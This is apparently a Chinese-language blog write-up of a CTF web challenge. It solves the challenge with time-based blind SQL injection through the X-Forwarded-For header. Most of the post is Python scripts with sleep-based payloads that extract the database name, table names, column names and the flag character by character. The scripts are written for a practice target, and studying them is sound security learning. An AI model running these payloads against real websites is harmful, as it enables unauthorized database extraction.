實驗吧CTF who are you?基於時間盲註
這是我第三次接觸時間盲註,所以就寫一個博文和大家分享一下,還能檢驗我對知識的掌握程度。?( ′???` )
點開網址是把你的真實IP地址打印出來!然後立馬看網頁源代碼什麽發現都沒有!
現在還沒有什麽想法,用burpsuite抓一下,看看能不能有什麽發現
沒有什麽發現,但是當我們回想打開網頁爆出我們的真實ip地址,既然是我們的真實ip,那麽在後端應該調用了類似$_SERVER[‘HTTP_X_FORWARDED_FOR’]之類的函數得到我們的真實ip地址。那麽我們就用bp來構造一個含有x-forwarded-for的header信息。
啊哈,我輸入什麽就輸出什麽,這很可能存在漏洞。經過驗證確實存在基於時間的盲註。為什麽是盲註呢。因為當我們寫一些SQL查詢語句時,不管正確與否,頁面都會把你的輸入的原樣輸出給你,這樣我們就不知道我們寫的語句對不對,有沒有其效果。所以我們在SQL查詢正確時讓程序sleep一段時間,然後在程序URL請求時,給它限制一個超時時間,這個超時時間小於sleep的時間,也就是說當SQL判斷正確時,URL請求那裏就會報錯,我們捕捉這個錯誤,讓它執行一些操作。
廢話不多說,給出我用python3寫的盲註腳本:
先簡單求出當前database的長度:
import requests
url = ‘http://ctf5.shiyanbar.com/web/wonderkun/index.php‘
for i in range(1,30):
key = {‘x-forwarded-for‘:"‘+"+"(select case when (length(database())=‘%s‘)then sleep(5) else 1 end) and ‘1‘=‘1"%i}
try:
print("正在第%s次判斷"%i)
r = requests.get(url, headers=key,timeout=4)
except:
print("庫名長度為%s"%i)
break
嗯~ 知道表的長度了,現在爆出庫名
import requests
import string
url = ‘http://ctf5.shiyanbar.com/web/wonderkun/index.php‘
str="qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM"
databaseName=‘‘
for i in range(1,5):
for payload in str:
key = {‘X-forwarded-for‘:"‘+"+"(select case when (substring((database()) from %d for 1)=‘%s‘) then sleep(5) else 1 end) and ‘1‘=‘1"%(i,payload)}
try:
print(key)
r = requests.get(url, headers=key,timeout=4)
except:
databaseName+=payload
print("數據庫名為是%s"%databaseName)
break
print(databaseName)
直接報表名
import requests
import string
url = ‘http://ctf5.shiyanbar.com/web/wonderkun/index.php‘
str=string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
tableName=[]
for i in range(0,5): #假設web4中有五個表
Name=‘‘
flag2=0
for col in range(1,11):#假設每個表的最大長度不超過10
flag=0
for payload in str:
key = {
‘X-forwarded-for‘: "‘+" + "(select case when (substring((select table_name "
"from information_schema.tables where (table_schema=‘web4‘) limit 1 "
"offset %d) from %d for 1)=‘%s‘) then sleep(5) else 1 end) and ‘1‘=‘1"%(i,col,payload)}
try:
print(key)
r = requests.get(url, headers=key, timeout=4)
except:
flag=1
flag2=1
Name += payload
print("第%s個表為是%s" % (i+1,Name))
break
#tableName.append(Name)
if flag==0:
break
if(flag2==0):
break
tableName.append(Name)
for a in range(len(tableName)):
print(tableName[a])
這裏我們一看對我們有用的表應該是flag
開始爆flag表中的所有列名
import requests
import string
url = ‘http://ctf5.shiyanbar.com/web/wonderkun/index.php‘
str=string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
columnName=[]
for i in range(0,5): #假設flag中有五個列
Name=‘‘
flag2=0
for col in range(1,11):#假設每個列名的最大長度不超過10
flag=0
for payload in str:
key = {
‘X-forwarded-for‘: "‘+" + "(select case when (substring((select column_name "
"from information_schema.columns where (table_name=‘flag‘) limit 1 "
"offset %d) from %d for 1)=‘%s‘) then sleep(5) else 1 end) and ‘1‘=‘1"%(i,col,payload)}
try:
print(key)
r = requests.get(url, headers=key, timeout=4)
except:
flag=1
flag2=1
Name += payload
print("第%s個表為是%s" % (i+1,Name))
break
#tableName.append(Name)
if flag==0:
break
if(flag2==0):
break
columnName.append(Name)
for a in range(len(columnName)):
print(columnName[a])
這裏我沒有該輸出,應該是“第一個字段名是flag”,既然知道了表和列名,開始爆內容吧!
import requests
import string
url = ‘http://ctf5.shiyanbar.com/web/wonderkun/index.php‘
str=string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
columnName=‘‘
for col in range(1,45):#假設每個列名的最大長度不超過10
flag=0
for payload in str:
key = {
‘X-forwarded-for‘: "‘+" + "(select case when (substring((select flag from flag) from %d for 1)=‘%s‘) then sleep(5) else 1 end) and ‘1‘=‘1"%(col,payload)}
try:
print(key)
r = requests.get(url, headers=key, timeout=4)
except:
flag=1
columnName += payload
print("內容為是%s" %columnName)
break
if flag==0:
break
print(columnName)
嗯~ flag就出來了,希望對您有幫助!
實驗吧CTF who are you?基於時間盲註